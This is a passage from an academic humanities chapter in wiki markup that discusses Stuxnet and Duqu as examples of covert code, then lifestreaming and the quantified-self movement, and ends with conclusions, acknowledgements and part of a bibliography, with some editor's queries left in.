Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentences reads better] was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
[Eds: is the following sentence somewhat superfluous, in that it just repeats the lead in to the next section that you provided at the end of your last section?] Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. [Eds: Do you need to give an indication as to what some of these questions might be?] The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that both enable the data transfers carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
